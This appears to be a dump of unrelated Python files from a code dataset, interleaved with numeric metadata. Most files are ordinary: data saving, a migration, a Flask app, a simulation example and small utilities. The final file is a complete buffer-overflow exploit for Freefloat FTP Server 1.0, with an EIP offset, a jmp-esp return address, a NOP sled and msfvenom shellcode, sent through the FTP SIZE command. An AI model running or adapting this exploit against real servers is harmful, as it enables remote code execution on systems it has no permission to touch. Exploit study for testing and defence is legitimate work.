                os.makedirs(result_location + '/' + foldername + '/' + train_num + '/' + 'nn_output')
            np.save(result_location + '/' + foldername + '/' + train_num + '/' + 'nn_output' + '/' + 'noiseinput_test.npy', noiseEEG_test)
            np.save(result_location + '/' + foldername + '/' + train_num + '/' + 'nn_output' + '/' + 'Denoiseoutput_test.npy', Denoiseoutput_test)  ####################### change the address!
            np.save(result_location + '/' + foldername + '/' + train_num + '/' + 'nn_output' + '/' + 'EEG_test.npy', EEG_test)
        except:
            print("Error during saving test signal.") | 70.702128 | 212 | 0.569064 | 344 | 3,323 | 5.19186 | 0.165698 | 0.12542 | 0.215006 | 0.243561 | 0.675812 | 0.585106 | 0.569429 | 0.569429 | 0.569429 | 0.515677 | 0 | 0 | 0.269335 | 3,323 | 47 | 213 | 70.702128 | 0.735585 | 0.050557 | 0 | 0.315789 | 0 | 0 | 0.14949 | 0.021732 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0 | 0.157895 | 0 | 0.184211 | 0.078947 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
267c0047e7d0c4375c0eee85199b970bfa59da8b | 567 | py | Python | contrib/C/libid3tag/test.py | finnianr/Eiffel-Loop | 387134fee1eae228abea6eea8f11a29ceef4c283 | [
"MIT"
] | 17 | 2016-03-15T19:41:19.000Z | 2021-12-25T18:55:17.000Z | contrib/C/libid3tag/test.py | finnianr/Eiffel-Loop | 387134fee1eae228abea6eea8f11a29ceef4c283 | [
"MIT"
] | 1 | 2017-05-18T18:55:03.000Z | 2017-05-18T19:14:10.000Z | contrib/C/libid3tag/test.py | finnianr/Eiffel-Loop | 387134fee1eae228abea6eea8f11a29ceef4c283 | [
"MIT"
] | 1 | 2016-11-18T18:18:41.000Z | 2016-11-18T18:18:41.000Z | import os
from os import path
from eiffel_loop.scons.c_library import LIBRARY_INFO
from eiffel_loop.package import TAR_GZ_SOFTWARE_PACKAGE
from eiffel_loop.package import SOFTWARE_PATCH
info = LIBRARY_INFO ('source/id3.getlib')
print 'is_list', isinstance (info.configure [0], list)
print 'url', info.url
print info.configure
print 'test_data', info.test_data
pkg = TAR_GZ_SOFTWARE_PACKAGE (info.url, info.c_dev, info.extracted)
patch = SOFTWARE_PATCH (info.patch_url, info.c_dev, info.extracted)
patch.apply ()
# create links to `include' and `test_dir'
| 21 | 68 | 0.784832 | 90 | 567 | 4.711111 | 0.411111 | 0.070755 | 0.099057 | 0.099057 | 0.264151 | 0.136792 | 0.136792 | 0 | 0 | 0 | 0 | 0.004016 | 0.121693 | 567 | 26 | 69 | 21.807692 | 0.84739 | 0.070547 | 0 | 0 | 0 | 0 | 0.068702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.384615 | null | null | 0.307692 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
2681002937e85246bec45ea2f0afad09060bd398 | 306 | py | Python | phone_communication_backup_coalescer/__main__.py | phillipgreenii/phone_communication_backup_coalescer | 58b47e8d05c66b4f3deae8ae1bc2bdb2cf1b71d6 | [
"MIT"
] | null | null | null | phone_communication_backup_coalescer/__main__.py | phillipgreenii/phone_communication_backup_coalescer | 58b47e8d05c66b4f3deae8ae1bc2bdb2cf1b71d6 | [
"MIT"
] | 7 | 2015-06-01T11:33:10.000Z | 2021-05-24T13:29:31.000Z | phone_communication_backup_coalescer/__main__.py | phillipgreenii/phone_communication_backup_coalescer | 58b47e8d05c66b4f3deae8ae1bc2bdb2cf1b71d6 | [
"MIT"
] | null | null | null | '''
phone_communication_backup_coalescer
Copyright 2016, Phillip Green II
Licensed under MIT.
'''
import logging
import sys
import cli
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s:%(message)s')
def main():
    cli.run(sys.argv[1:])


if __name__ == "__main__":
    main()
| 14.571429 | 87 | 0.715686 | 41 | 306 | 5.073171 | 0.756098 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019011 | 0.140523 | 306 | 20 | 88 | 15.3 | 0.771863 | 0.29085 | 0 | 0 | 0 | 0 | 0.215311 | 0.119617 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | true | 0 | 0.375 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
26872cc3f537a0ffe66c811df2a6c89c185cd030 | 399 | py | Python | databases/migrations/2020_09_22_071121_add_data_pressure.py | krishotte/env_data2 | 379f3bef686e5668019d11351aa4dae4eae05d37 | [
"MIT"
] | null | null | null | databases/migrations/2020_09_22_071121_add_data_pressure.py | krishotte/env_data2 | 379f3bef686e5668019d11351aa4dae4eae05d37 | [
"MIT"
] | null | null | null | databases/migrations/2020_09_22_071121_add_data_pressure.py | krishotte/env_data2 | 379f3bef686e5668019d11351aa4dae4eae05d37 | [
"MIT"
] | null | null | null | from orator.migrations import Migration
class AddDataPressure(Migration):
    def up(self):
        """
        Run the migrations.
        """
        with self.schema.table('data') as table:
            table.float('pressure')

    def down(self):
        """
        Revert the migrations.
        """
        with self.schema.table('data') as table:
            table.drop_column('pressure')
| 21 | 48 | 0.553885 | 41 | 399 | 5.365854 | 0.560976 | 0.118182 | 0.154545 | 0.190909 | 0.436364 | 0.436364 | 0.436364 | 0.436364 | 0.436364 | 0.436364 | 0 | 0 | 0.325815 | 399 | 18 | 49 | 22.166667 | 0.817844 | 0.105263 | 0 | 0.25 | 0 | 0 | 0.077419 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
cd2050df8a85fddacffc2ef8c51ed38d55e95d95 | 1,432 | py | Python | examples/action_models/AD4_XOr_2Actions_Test.py | pcyoung75/SysMPy | 2684e28eb8ad63c351e3327591bc2d988480e6a3 | [
"Apache-2.0"
] | null | null | null | examples/action_models/AD4_XOr_2Actions_Test.py | pcyoung75/SysMPy | 2684e28eb8ad63c351e3327591bc2d988480e6a3 | [
"Apache-2.0"
] | null | null | null | examples/action_models/AD4_XOr_2Actions_Test.py | pcyoung75/SysMPy | 2684e28eb8ad63c351e3327591bc2d988480e6a3 | [
"Apache-2.0"
] | null | null | null | from sysmpy import *
import asyncio
"""
            +---------------+
            |               |
            |     start     |
            |               |
            +---------------+
                    | process
        +---------(XO)----------+
        | p1                    | p2
+---------------+       +---------------+
|               |       |               |
|    Action1    |       |    Action2    |
|               |       |               |
+---------------+       +---------------+
        |                       |
        +---------(XO)----------+
                    |
            +---------------+
            |               |
            |      End      |
            |               |
            +---------------+
"""
print('AD4_XOr_2Actions_Test')
###############################################
# 1 Define a model
p = Process("process")
p_or = p.XOr()
p1 = p_or.Process("p1")
p2 = p_or.Process("p2")
p_act1 = p1.Action("Action1")
p_act2 = p2.Action("Action2")
###############################################
# 2 Run a simulation
asyncio.run(p.sim(print_out=True))
| 34.926829 | 57 | 0.168994 | 61 | 1,432 | 3.819672 | 0.52459 | 0.038627 | 0.085837 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02995 | 0.580307 | 1,432 | 40 | 58 | 35.8 | 0.357737 | 0.024441 | 0 | 0 | 0 | 0 | 0.179688 | 0.082031 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
cd24412577cb4d8966d1f35a9dca22dd26ef8547 | 522 | py | Python | minpmt.py | joeryan/mit600x | 18c9c6606d9476b436216eccc6fae5b7ef5b6015 | [
"MIT"
] | null | null | null | minpmt.py | joeryan/mit600x | 18c9c6606d9476b436216eccc6fae5b7ef5b6015 | [
"MIT"
] | null | null | null | minpmt.py | joeryan/mit600x | 18c9c6606d9476b436216eccc6fae5b7ef5b6015 | [
"MIT"
] | null | null | null | # edX MIT6.00.1x programming in python
# problem set 2, week 2, problem 2
# minumum payment to pay off debt in one year
annualInterestRate = 0.2
balance = 3926.0
monthlyInterest = annualInterestRate / 12
remainingBal = balance
monthlyPmt = 10
while remainingBal > 0:
    for month in range(1, 13):
        remainingBal -= monthlyPmt
        remainingBal += monthlyInterest * remainingBal
    if remainingBal > 0:
        remainingBal = balance
        monthlyPmt += 10
print "Lowest Payment: %d" % monthlyPmt | 24.857143 | 54 | 0.687739 | 62 | 522 | 5.790323 | 0.612903 | 0.10585 | 0.16156 | 0.172702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.062972 | 0.239464 | 522 | 21 | 55 | 24.857143 | 0.84131 | 0.216475 | 0 | 0.153846 | 0 | 0 | 0.044335 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
cd2dddb933352e4e52dfaa33fde7af380ff1ac57 | 171 | py | Python | src/config/deprecated/tos-tossim/tester.py | BigstarPie/WuKongProject | e8e4a9d3f56732b2fdc8c5c48d0be93d31f57376 | [
"BSD-2-Clause-FreeBSD"
] | 16 | 2015-01-07T10:32:47.000Z | 2019-01-16T16:13:51.000Z | src/config/deprecated/tos-tossim/tester.py | BigstarPie/WuKongProject | e8e4a9d3f56732b2fdc8c5c48d0be93d31f57376 | [
"BSD-2-Clause-FreeBSD"
] | 14 | 2015-05-01T04:45:45.000Z | 2016-05-11T01:29:23.000Z | src/config/deprecated/tos-tossim/tester.py | BigstarPie/WuKongProject | e8e4a9d3f56732b2fdc8c5c48d0be93d31f57376 | [
"BSD-2-Clause-FreeBSD"
] | 13 | 2015-06-17T06:42:17.000Z | 2020-11-27T18:23:08.000Z | import sys
from TOSSIM import *
t = Tossim([])
t.runNextEvent()
m = t.getNode(32)
m.turnOn()
t.addChannel("DEBUG", sys.stdout)
while (m.isOn() == 1):
    t.runNextEvent()
| 14.25 | 33 | 0.654971 | 26 | 171 | 4.307692 | 0.615385 | 0.232143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020548 | 0.146199 | 171 | 11 | 34 | 15.545455 | 0.746575 | 0 | 0 | 0.222222 | 0 | 0 | 0.029412 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
cd4deeae46aef01f74825efa49b6f08354b32266 | 7,875 | py | Python | app.py | guof25/watchlist | 1c35ee4bd70e4cd83007f38a490f6a14a1e060b7 | [
"MIT"
] | null | null | null | app.py | guof25/watchlist | 1c35ee4bd70e4cd83007f38a490f6a14a1e060b7 | [
"MIT"
] | null | null | null | app.py | guof25/watchlist | 1c35ee4bd70e4cd83007f38a490f6a14a1e060b7 | [
"MIT"
] | null | null | null | from watchlist import app
'''
from flask import Flask,url_for,render_template,request,flash,redirect # import the Flask class; url_for does reverse URL resolution
from faker import Factory # use faker to generate test data
from settings import DebugMode,TestingMode # configuration modes
from flask_sqlalchemy import SQLAlchemy # database extension
from werkzeug.security import generate_password_hash,check_password_hash # password hashing and verification
from flask_login import LoginManager,login_user,UserMixin,login_required, logout_user,current_user # user authentication
import os
import sys
import click # command-line tooling
# **************** Flask instantiation *******************
app = Flask(__name__)
# *************** database extension ********************
# SQLite, a file-based database
WIN = sys.platform.startswith("win")
if WIN:
prefix = "sqlite:///"
else:
prefix = "sqlite:////"
app.config["SQLALCHEMY_DATABASE_URI"] = prefix + os.path.join(app.root_path,"data.db")
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app) # initialize the db object
# ********************** development-mode settings *************************
app.config.from_object(DebugMode) # enable DEBUG mode: error tracebacks are shown directly in the page
#app.config.from_object(TestingMode) # in TESTING mode the page only reports that an error occurred, without the detailed traceback
# *********************** user authentication ***********************
login_manager = LoginManager(app)
login_manager.login_view = 'login'
@login_manager.user_loader
def load_user(user_id):
user = User.query.get(int(user_id))
return user
# ************************ model class definitions ****************************************
class User(db.Model,UserMixin): # inherits from db.Model
__tablename__ = "wl_user" # database table name; defaults to the class name if not defined
id = db.Column(db.Integer,primary_key=True) # in Flask the primary key must be defined explicitly; auto-incrementing
name = db.Column(db.String(20))
username = db.Column(db.String(20))
password_hash =db.Column(db.String(128))
def set_password(self,password):
self.password_hash = generate_password_hash(password)
def validate_password(self,password):
return check_password_hash(self.password_hash,password)
class Movie(db.Model):
__tablename__ = "wl_movie"
id = db.Column(db.Integer,primary_key=True)
title = db.Column(db.String(20))
year = db.Column(db.String(4))
# ************************* project test data ******************************
fake = Factory.create() # generate test data through the faker module
#fake = Factory.create('zh_CN') # localization
# seed the database using click commands
@app.cli.command() # register the command
def gen_db_data():
db.drop_all()
db.create_all()
users = []
movies = []
for i in range(10):
item = {}
item["title"] = fake.name()
item["year"] = fake.year()
movies.append(item)
for i in range(1):
item = {}
item["name"]=fake.name()
users.append(item)
db.session.bulk_insert_mappings(User,users) # bulk-insert rows
db.session.bulk_insert_mappings(Movie,movies)
db.session.commit()
click.echo("data generated!")
# *************** create the admin account *******************************
@app.cli.command()
@click.option("--username",prompt=True,help="the username used to login")
@click.option("--password",prompt=True,hide_input=True,confirmation_prompt=True,help="the password used to login")
def admin(username,password):
user = User.query.first()
if user is not None:
click.echo("update user..")
user.name="admin"
user.username = username
user.set_password(password)
else:
click.echo("creating user..")
user = User(username = username,name="admin")
user.set_password(password)
db.session.add(user)
db.session.commit()
click.echo("done..")
# **************** register template globals ******************************
@app.context_processor # variables available to all templates
def inject_user():
user = User.query.first()
return dict(user=user)
# ******************* error responses **********************************
# 404 error
@app.errorhandler(404) # register the error code with app.errorhandler
def page_not_found(e): # receives the exception as an argument
user = User.query.first()
return render_template("404_extend.html"),404 # the status code is returned as the second value; normal view functions default to 200, so it can be omitted
# ******************* template filters ************************************
# custom template filter
@app.template_filter("my_filter") # register the filter name
def gf(value):
return value.replace('name','guof')
# ****************** routes and view functions *******************************
# home page
@app.route("/",methods=['GET','POST']) # register the route; if methods is omitted only GET is accepted
def index():
# request only holds data while a request is active, so it can only be used inside view functions
if request.method == "POST": # dispatch on request.method (GET/POST)
if not current_user.is_authenticated: # if the current user is not authenticated
flash("not login..")
return redirect(url_for('index')) # redirect to the home page
title = request.form.get("title")
year = request.form.get("year")
if not all([title,year]):
#flash() passes messages from view functions to templates; the messages are stored in the session
#get_flashed_messages() then retrieves them inside the template
flash("title and year are required.")
return redirect(url_for('index'))
elif len(year)!=4 or len(title)>60:
flash("info format is invalid")
return redirect(url_for('index'))
movie = Movie(title=title,year=year)
db.session.add(movie)
db.session.commit()
flash("item created.")
return redirect(url_for('index'))
else:
user = User.query.first()
movies = Movie.query.all()
return render_template("index_extend.html",movies=movies)
# delete a record
@app.route("/del/<int:id>",methods=['GET','POST'])
@login_required
def delMovie(id):
movie = Movie.query.get_or_404(id)
db.session.delete(movie)
db.session.commit()
flash("item deleted!")
return redirect(url_for('index'))
# update a record
@app.route('/edit/<int:movie_id>', methods=['GET', 'POST'])
@login_required
def edit(movie_id):
movie = Movie.query.get_or_404(movie_id)
if request.method == 'POST': # handle the edit form submission
title = request.form['title']
year = request.form['year']
if not title or not year or len(year) != 4 or len(title) > 60:
flash('Invalid input.')
return redirect(url_for('edit', movie_id=movie.id)) # redirect back to the corresponding edit page
movie.title = title
movie.year = year
db.session.commit()
flash('Item updated.')
return redirect(url_for('index'))
else:
return render_template('edit_extend.html', movie=movie)
# login page
@app.route('/login',methods=['GET','POST'])
def login():
if request.method == "POST":
username = request.form["username"]
password = request.form["password"]
if not all([username,password]):
flash("invalid input")
return redirect(url_for('login'))
user = User.query.first()
if username == user.username and user.validate_password(password):
login_user(user) # use the login_user function provided by flask-login
flash('Login success.')
return redirect(url_for('index')) # redirect to the home page
else:
flash('Invalid username or password.') # show an error message if validation fails
return redirect(url_for('login')) # redirect back to the login page
else:
return render_template('login_extend.html')
# logout page
@app.route('/logout')
@login_required
def logout():
logout_user()
flash("Goodbye.")
return redirect(url_for('index')) # redirect to the home page
@app.route('/settings',methods=['GET','POST'])
@login_required
def settings():
if request.method == 'POST':
name = request.form["name"]
if not name or len(name)>20:
flash("invalid username")
return redirect(url_for('settings'))
current_user.name = name
db.session.commit()
flash("settings updated")
return redirect(url_for('index'))
else:
return render_template('settings.html')
'''
# ************************* Flask application startup *********************************
if __name__ == "__main__":
app.run()
| 33.368644 | 114 | 0.594794 | 890 | 7,875 | 5.162921 | 0.273034 | 0.018281 | 0.048096 | 0.056583 | 0.216322 | 0.135147 | 0.089445 | 0.049619 | 0.024374 | 0.024374 | 0 | 0.006716 | 0.205841 | 7,875 | 235 | 115 | 33.510638 | 0.722578 | 0.008889 | 0 | 0 | 0 | 0 | 0.112676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
cd5ac9f446b1220c704f787f2f973a8cf1ad49f9 | 1,700 | py | Python | _GTW/_OMP/_Auth/Account_in_Group.py | Tapyr/tapyr | 4235fba6dce169fe747cce4d17d88dcf4a3f9f1d | [
"BSD-3-Clause"
] | 6 | 2016-12-10T17:51:10.000Z | 2021-10-11T07:51:48.000Z | _GTW/_OMP/_Auth/Account_in_Group.py | Tapyr/tapyr | 4235fba6dce169fe747cce4d17d88dcf4a3f9f1d | [
"BSD-3-Clause"
] | null | null | null | _GTW/_OMP/_Auth/Account_in_Group.py | Tapyr/tapyr | 4235fba6dce169fe747cce4d17d88dcf4a3f9f1d | [
"BSD-3-Clause"
] | 3 | 2020-03-29T07:37:03.000Z | 2021-01-21T16:08:40.000Z | # -*- coding: utf-8 -*-
# Copyright (C) 2010-2013 Mag. Christian Tanzer All rights reserved
# Glasauergasse 32, A--1130 Wien, Austria. tanzer@swing.co.at
# ****************************************************************************
# This module is part of the package GTW.OMP.Auth.
#
# This module is licensed under the terms of the BSD 3-Clause License
# <http://www.c-tanzer.at/license/bsd_3c.html>.
# ****************************************************************************
#
#++
# Name
# GTW.OMP.Auth.Account_in_Group
#
# Purpose
# Model association Account_in_Group
#
# Revision Dates
# 16-Jan-2010 (CT) Creation
# 18-Jan-2010 (CT) `auto_cache` added
# 15-May-2013 (CT) Rename `auto_cache` to `auto_rev_ref`
# ««revision-date»»···
#--
from _MOM.import_MOM import *
from _GTW import GTW
from _GTW._OMP._Auth import Auth
import _GTW._OMP._Auth.Entity
import _GTW._OMP._Auth.Account
import _GTW._OMP._Auth.Group
from _TFL.I18N import _, _T, _Tn
_Ancestor_Essence = Auth.Link2
class Account_in_Group (_Ancestor_Essence) :
    """Model association Account_in_Group"""

    class _Attributes (_Ancestor_Essence._Attributes) :

        _Ancestor = _Ancestor_Essence._Attributes

        class left (_Ancestor.left) :

            role_type    = Auth.Account
            auto_rev_ref = True

        # end class left

        class right (_Ancestor.right) :

            role_type    = Auth.Group
            auto_rev_ref = True

        # end class right

    # end class _Attributes

# end class Account_in_Group

if __name__ != "__main__" :
    GTW.OMP.Auth._Export ("*")
### __END__ GTW.OMP.Auth.Account_in_Group
| 26.153846 | 78 | 0.594706 | 209 | 1,700 | 4.535885 | 0.435407 | 0.050633 | 0.084388 | 0.053797 | 0.160338 | 0.097046 | 0 | 0 | 0 | 0 | 0 | 0.028679 | 0.220588 | 1,700 | 64 | 79 | 26.5625 | 0.681509 | 0.512353 | 0 | 0.105263 | 0 | 0 | 0.011335 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.368421 | 0 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
cd7163ba843663ad805f853b3b02b2587fa6d694 | 1,038 | py | Python | karp/query_dsl/node.py | spraakbanken/karp-backend-v6-tmp | e5b78157bd999df18c188973ae2a337015b6f35d | [
"MIT"
] | 1 | 2021-12-08T15:33:42.000Z | 2021-12-08T15:33:42.000Z | karp/query_dsl/node.py | spraakbanken/karp-backend-v6-tmp | e5b78157bd999df18c188973ae2a337015b6f35d | [
"MIT"
] | null | null | null | karp/query_dsl/node.py | spraakbanken/karp-backend-v6-tmp | e5b78157bd999df18c188973ae2a337015b6f35d | [
"MIT"
] | null | null | null | class Node:
    def __init__(self, type_, arity: int, value=None):
        self.type = type_
        self.arity = arity
        self.value = value
        self.children = []

    def __repr__(self):
        return "<Node {t} {v} {c}>".format(t=self.type, v=self.value, c=self.children)

    def _pprint(self, level):
        fill = " "
        print(
            "{indent} Node {t} {v}".format(
                indent=fill * level, t=self.type, v=self.value
            )
        )
        for child in self.children:
            child._pprint(level + 1)

    def pprint(self, level: int = 0):
        self._pprint(level)

    def add_child(self, child):
        self.children.append(child)

    def n_children(self) -> int:
        return len(self.children)

    def gen_stream(self):
        yield self
        for child in self.children:
            yield from child.gen_stream()


def create_unary_node(type_, value=None):
    return Node(type_, 1, value)


def create_binary_node(type_, value=None):
    return Node(type_, 2, value)
| 24.714286 | 86 | 0.569364 | 135 | 1,038 | 4.192593 | 0.288889 | 0.127208 | 0.079505 | 0.035336 | 0.254417 | 0.176678 | 0.109541 | 0 | 0 | 0 | 0 | 0.005563 | 0.307322 | 1,038 | 41 | 87 | 25.317073 | 0.781641 | 0 | 0 | 0.064516 | 0 | 0 | 0.038536 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.290323 | false | 0 | 0 | 0.129032 | 0.451613 | 0.16129 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
cd79fbd3b3e7215ef315a80dd8ce6ee0fef9eb15 | 4,335 | py | Python | Buffer Overflow BOF Scripts/FFTPS_v1.0.py | JAYMONSECURITY/JMSec-Blog-Resources | 61bcab0cbfceab8d46c039f5a5165b8f9da6737f | [
"MIT"
] | 2 | 2021-09-08T23:57:47.000Z | 2022-02-15T09:58:36.000Z | Buffer Overflow BOF Scripts/FFTPS_v1.0.py | JAYMONSECURITY/JMSec-Blog-Resources | 61bcab0cbfceab8d46c039f5a5165b8f9da6737f | [
"MIT"
] | null | null | null | Buffer Overflow BOF Scripts/FFTPS_v1.0.py | JAYMONSECURITY/JMSec-Blog-Resources | 61bcab0cbfceab8d46c039f5a5165b8f9da6737f | [
"MIT"
] | 2 | 2021-09-09T13:42:12.000Z | 2022-02-15T23:39:02.000Z | #!/usr/bin/env python
#---------------------------------------------------------------------------------------------#
# Software = Freefloat FTP server version 1.0 #
# Download Link = http://www.mediafire.com/file/9cds1786340avnn/Freefloat+FTP+Server+v1.0.rar #
# Date = 8/20/2017 #
# Reference = https://packetstormsecurity.com/files/103746/freefloatftp-overflow.txt #
# Author = @ihack4falafel #
# Tested on = Windows XP SP3 - Professional #
# EIP Offset = 246 #
# Badchars = "\x00\x0A\x0D" #
# RET Address = 7E429353 "\xFF\xE4" | [USER32.dll] #
# Usage = python exploit.py <target IP> #
#---------------------------------------------------------------------------------------------#
#---------------------------------------------------------------------------------------------#
# List of Vuln. Commands = [DELE, MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE, STAT] #
#---------------------------------------------------------------------------------------------#
import sys
import socket
import struct
import time
if len(sys.argv) < 2:
    print "Usage : python exploit.py <target IP>"
    print "Example : python exploit.py 127.0.0.1"
    sys.exit(0)
HOST = sys.argv[1]
#------------------------------------------------------------------------------#
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0A\x0D" -f python -v payload #
#------------------------------------------------------------------------------#
payload = ""
payload += "\xbd\x71\xa7\xd9\x36\xdd\xc7\xd9\x74\x24\xf4\x5a"
payload += "\x31\xc9\xb1\x31\x31\x6a\x13\x83\xc2\x04\x03\x6a"
payload += "\x7e\x45\x2c\xca\x68\x0b\xcf\x33\x68\x6c\x59\xd6"
payload += "\x59\xac\x3d\x92\xc9\x1c\x35\xf6\xe5\xd7\x1b\xe3"
payload += "\x7e\x95\xb3\x04\x37\x10\xe2\x2b\xc8\x09\xd6\x2a"
payload += "\x4a\x50\x0b\x8d\x73\x9b\x5e\xcc\xb4\xc6\x93\x9c"
payload += "\x6d\x8c\x06\x31\x1a\xd8\x9a\xba\x50\xcc\x9a\x5f"
payload += "\x20\xef\x8b\xf1\x3b\xb6\x0b\xf3\xe8\xc2\x05\xeb"
payload += "\xed\xef\xdc\x80\xc5\x84\xde\x40\x14\x64\x4c\xad"
payload += "\x99\x97\x8c\xe9\x1d\x48\xfb\x03\x5e\xf5\xfc\xd7"
payload += "\x1d\x21\x88\xc3\x85\xa2\x2a\x28\x34\x66\xac\xbb"
payload += "\x3a\xc3\xba\xe4\x5e\xd2\x6f\x9f\x5a\x5f\x8e\x70"
payload += "\xeb\x1b\xb5\x54\xb0\xf8\xd4\xcd\x1c\xae\xe9\x0e"
payload += "\xff\x0f\x4c\x44\xed\x44\xfd\x07\x7b\x9a\x73\x32"
payload += "\xc9\x9c\x8b\x3d\x7d\xf5\xba\xb6\x12\x82\x42\x1d"
payload += "\x57\x7c\x09\x3c\xf1\x15\xd4\xd4\x40\x78\xe7\x02"
payload += "\x86\x85\x64\xa7\x76\x72\x74\xc2\x73\x3e\x32\x3e"
payload += "\x09\x2f\xd7\x40\xbe\x50\xf2\x22\x21\xc3\x9e\x8a"
payload += "\xc4\x63\x04\xd3"
#----------------------------#
# Buffer Structure #
#----------------------------#
# buffer = SIZE #
# buffer = " " #
# buffer = AAA...........AAA #
# buffer = EIP #
# buffer = NOPSled #
# buffer = payload #
# buffer = BBB...........BBB #
# buffer = "\r\n" #
#----------------------------#
buffer = "SIZE"
buffer += " "
buffer += "A" * 246
buffer += struct.pack('<L', 0x7E429353)
buffer += "\x90" * 40
buffer += payload
buffer += "B" * (1000-246-4-40-len(payload))
buffer += "\r\n"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, 21))
    print "[+] Connected to FreeFloat FTP Server with IP: %s and port: 21 " %(HOST)
    print "[+] sending USER test.."
    time.sleep(1)
    s.send("USER test\r\n")
    banner = s.recv(1024)
    print banner
    print "[+] sending PASS test.."
    time.sleep(1)
    s.send("PASS test\r\n")
    logged_in = s.recv(1024)
    print logged_in
    print "[+] sending %s bytes evil payload.." %len(buffer)
    time.sleep(1)
    s.send(buffer)
    print "FreeFloat FTP Server should be crashed by now \m/"
    s.close()
except Exception,msg:
    print "[+] Unable to connect to FreeFloat FTP Server"
    sys.exit(0)
